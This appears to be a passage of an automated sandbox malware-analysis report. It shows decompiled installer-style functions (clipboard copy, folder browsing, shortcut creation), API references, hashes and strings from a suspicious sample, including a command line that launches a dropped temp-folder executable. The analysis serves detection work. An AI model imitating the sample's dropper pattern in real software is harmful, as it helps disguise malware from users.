Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 7a4d027f099effcba9a875e41588830efd81f609a84ab4e326c73c2aaae1a309
Instruction ID: 8c0427486d29053335645041865d96f0af5997519b71f4a23b4502285a2a7229
Opcode Fuzzy Hash: 7a4d027f099effcba9a875e41588830efd81f609a84ab4e326c73c2aaae1a309
Instruction Fuzzy Hash: 4AF09072904012EBCB21ABA59994E9E72A4DF00318F25413BE102B21E1D77C4E528AAE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004056A8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004056A8(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429204;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040563C, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406544(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423708;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x4291ec == _t156) {
							ShowWindow( *0x42a228, 8);
							if( *0x42a2ac == _t156) {
								E00405569( *((intOrPtr*)( *0x4226e0 + 0x34)), _t156);
							}
							E0040443C(_t171);
							goto L25;
						}
						 *0x421ed8 = 2;
						E0040443C(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E004044CA(_a8, _a12, _a16);
						}
						ShowWindow( *0x4291f0, _t156);
						ShowWindow(_t169, 8);
						E00404498(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a230;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x4291f0 = GetDlgItem(_a4, 0x403);
				 *0x4291e8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429204 = _t134;
				_v8 = _t134;
				E00404498( *0x4291f0);
				 *0x4291f4 = E00404DF1(4);
				 *0x42920c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404463(_a4);
				if(( *0x42a238 & 0x00000003) != 0) {
					ShowWindow( *0x4291f0, _t156);
					if(( *0x42a238 & 0x00000002) != 0) {
						 *0x4291f0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404498( *0x4291e8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a238 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004056b0
0x004056b6
0x004056c0
0x004056c3
0x00405859
0x0040587d
0x0040587d
0x00405890
0x004058ae
0x004058b0
0x004058b8
0x0040590e
0x00405912
0x00000000
0x00000000
0x00405914
0x0040591a
0x00000000
0x00000000
0x00405924
0x0040592c
0x0040592f
0x00405a31
0x00000000
0x00405a31
0x0040593e
0x00405949
0x00405952
0x0040595d
0x00405960
0x00405969
0x0040596f
0x00405972
0x00405972
0x0040598a
0x00405993
0x00405996
0x0040599d
0x004059a4
0x004059ac
0x004059ac
0x004059c3
0x004059c3
0x004059ca
0x004059d0
0x004059dc
0x004059e3
0x004059ec
0x004059ee
0x004059f1
0x00405a00
0x00405a03
0x00405a09
0x00405a0a
0x00405a10
0x00405a11
0x00405a12
0x00405a1a
0x00405a25
0x00405a2b
0x00405a2b
0x00000000
0x0040598a
0x004058c0
0x004058f0
0x004058f8
0x00405903
0x00405903
0x00405909
0x00000000
0x00405909
0x004058c4
0x004058ce
0x00000000
0x00405892
0x00405898
0x004058d3
0x00000000
0x004058dc
0x004058a1
0x004058a6
0x004058a9
0x00000000
0x004058a9
0x00405890
0x004056c9
0x004056cd
0x004056d5
0x004056d9
0x004056dc
0x004056df
0x004056e2
0x004056e5
0x004056e6
0x004056e7
0x00405700
0x00405703
0x0040570d
0x0040571c
0x00405724
0x0040572c
0x00405731
0x00405734
0x00405740
0x00405749
0x00405752
0x00405774
0x0040577a
0x0040578b
0x00405790
0x0040579e
0x004057ac
0x004057ac
0x004057b1
0x004057bf
0x004057bf
0x004057c4
0x004057c7
0x004057cc
0x004057d8
0x004057e1
0x004057ee
0x004057fd
0x004057f0
0x004057f5
0x004057f5
0x00405809
0x00405809
0x0040581d
0x00405826
0x0040582f
0x0040583f
0x0040584b
0x0040584b
0x00000000

APIs

GetDlgItem.USER32 ref: 00405706
GetDlgItem.USER32 ref: 00405715
GetClientRect.USER32 ref: 00405752
GetSystemMetrics.USER32 ref: 00405759
SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
ShowWindow.USER32(?,00000008), ref: 004057F5
GetDlgItem.USER32 ref: 00405816
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
GetDlgItem.USER32 ref: 00405724

Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

GetDlgItem.USER32 ref: 00405868
CreateThread.KERNEL32 ref: 00405876
CloseHandle.KERNEL32(00000000), ref: 0040587D
ShowWindow.USER32(00000000), ref: 004058A1
ShowWindow.USER32(?,00000008), ref: 004058A6
ShowWindow.USER32(00000008), ref: 004058F0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
CreatePopupMenu.USER32 ref: 00405935
AppendMenuW.USER32 ref: 00405949
GetWindowRect.USER32 ref: 00405969
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
OpenClipboard.USER32(00000000), ref: 004059CA
EmptyClipboard.USER32 ref: 004059D0
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
GlobalLock.KERNEL32 ref: 004059E6
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
CloseClipboard.USER32 ref: 00405A2B

Strings

{, xrefs: 0040590E

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 165a3cd4051cb0ed5c4fcd35f2f77f5a32e68e104ce1385ff96711eca5f40e5a
Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
Opcode Fuzzy Hash: 165a3cd4051cb0ed5c4fcd35f2f77f5a32e68e104ce1385ff96711eca5f40e5a
Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00404954 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404954(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x4226e0;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B4B(0x3fb, _t146);
					E0040678E(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B4B(0x3fb, _t146);
							if(E00405EDE(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406507(0x4216d8, _t146);
							_t87 = E004068D4(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406507(0x4216d8, _t146);
								_t89 = E00405E81(0x4216d8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4216d8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4216d8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x4216d8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E22(0x4216d8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4216d8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404DF1(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x4291fc + 0x10)) != _t158) {
									E00404DD9(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4216c8);
									} else {
										E00404D10(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a2c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404485(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x4236f8 == _t158) {
									E004048AD();
								}
								 *0x4236f8 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423708;
							_v60 = E00404CAA;
							_v56 = _t146;
							_v68 = E00406544(_t146, 0x423708, _t167, 0x421ee0, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405DD6(_t146);
								_t125 =  *((intOrPtr*)( *0x42a230 + 0x11c));
								if( *((intOrPtr*)( *0x42a230 + 0x11c)) != 0 && _t146 == L"C:\\Users\\engineer\\AppData\\Local\\Temp") {
									E00406544(_t146, 0x423708, _t167, 0, _t125);
									if(lstrcmpiW(0x4281c0, 0x423708) != 0) {
										lstrcatW(_t146, 0x4281c0);
									}
								}
								 *0x4236f8 =  *0x4236f8 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E4D(_t146) != 0 && E00405E81(_t146) == 0) {
						E00405DD6(_t146);
					}
					 *0x4291f8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404463(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404463(_t167);
					E00404498(_t166);
					_t138 = E004068D4(8);
					if(_t138 == 0) {
						L53:
						return E004044CA(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404954
0x0040495a
0x00404960
0x0040496d
0x0040497b
0x0040497e
0x00404986
0x0040498c
0x0040498c
0x00404998
0x0040499b
0x00404a09
0x00404a10
0x00404ae7
0x00404aee
0x00404afd
0x00404afd
0x00404b01
0x00404b0b
0x00404b18
0x00404b1a
0x00404b1a
0x00404b28
0x00404b2f
0x00404b36
0x00404b39
0x00404b75
0x00404b77
0x00404b7d
0x00404b82
0x00404b86
0x00404b88
0x00404b88
0x00404ba4
0x00000000
0x00404ba6
0x00404ba9
0x00404bb7
0x00404bbd
0x00404bbe
0x00404bc1
0x00404bc4
0x00000000
0x00404bc4
0x00404b3b
0x00404b3d
0x00404b41
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b43
0x00404b43
0x00404b50
0x00404b55
0x00000000
0x00000000
0x00404b59
0x00404b5b
0x00404b5b
0x00404b64
0x00404b66
0x00404b6b
0x00404b6e
0x00404b73
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b73
0x00404bd0
0x00404bda
0x00404bdd
0x00404be0
0x00404be7
0x00404be7
0x00404be9
0x00404be9
0x00404bee
0x00404bf0
0x00404bf8
0x00404bff
0x00404c01
0x00404c0c
0x00404c0c
0x00404c01
0x00404c1c
0x00404c26
0x00404c2e
0x00404c49
0x00404c30
0x00404c39
0x00404c39
0x00404c2e
0x00404c4e
0x00404c53
0x00404c58
0x00404c61
0x00404c61
0x00404c6a
0x00404c6c
0x00404c6c
0x00404c78
0x00404c80
0x00404c8a
0x00404c8a
0x00404c8f
0x00000000
0x00404c8f
0x00404b39
0x00404af0
0x00404af7
0x00000000
0x00000000
0x00000000
0x00404af7
0x00404a16
0x00404a1f
0x00404a39
0x00404a3e
0x00404a48
0x00404a4f
0x00404a5b
0x00404a5e
0x00404a61
0x00404a68
0x00404a70
0x00404a73
0x00404a77
0x00404a7e
0x00404a86
0x00404ae0
0x00404a88
0x00404a89
0x00404a90
0x00404a9a
0x00404aa2
0x00404aaf
0x00404ac3
0x00404ac7
0x00404ac7
0x00404ac3
0x00404acc
0x00404ad9
0x00404ad9
0x00404a86
0x00000000
0x00404a3e
0x00404a2c
0x00000000
0x00000000
0x00404a32
0x00000000
0x0040499d
0x004049aa
0x004049b3
0x004049c0
0x004049c0
0x004049c7
0x004049cd
0x004049d6
0x004049d9
0x004049dc
0x004049e4
0x004049e7
0x004049ea
0x004049f0
0x004049f7
0x004049fe
0x00404c95
0x00404ca7
0x00404a04
0x00404a07
0x00000000
0x00404a07
0x004049fe

APIs

GetDlgItem.USER32 ref: 004049A3
SetWindowTextW.USER32(00000000,?), ref: 004049CD
SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
CoTaskMemFree.OLE32(00000000), ref: 00404A89
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,00423708,00000000,?,?), ref: 00404ABB
lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny), ref: 00404AC7
SetDlgItemTextW.USER32 ref: 00404AD9

Part of subcall function 00405B4B: GetDlgItemTextW.USER32 ref: 00405B5E

Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
Part of subcall function 0040678E: CharNextW.USER32(?,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
Part of subcall function 0040678E: CharPrevW.USER32(?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818

GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7

Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
Part of subcall function 00404D10: SetDlgItemTextW.USER32 ref: 00404DCD

Strings

C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny, xrefs: 00404AB5, 00404ABA, 00404AC5
C:\Users\user\AppData\Local\Temp, xrefs: 00404AA4
A, xrefs: 00404A77

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny
API String ID: 2624150263-3242952907
Opcode ID: 48ad64a3fb01620437031791bd8cc3571db2214d75aa2af41fbbb2d007395b46
Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
Opcode Fuzzy Hash: 48ad64a3fb01620437031791bd8cc3571db2214d75aa2af41fbbb2d007395b46
Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E4D( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
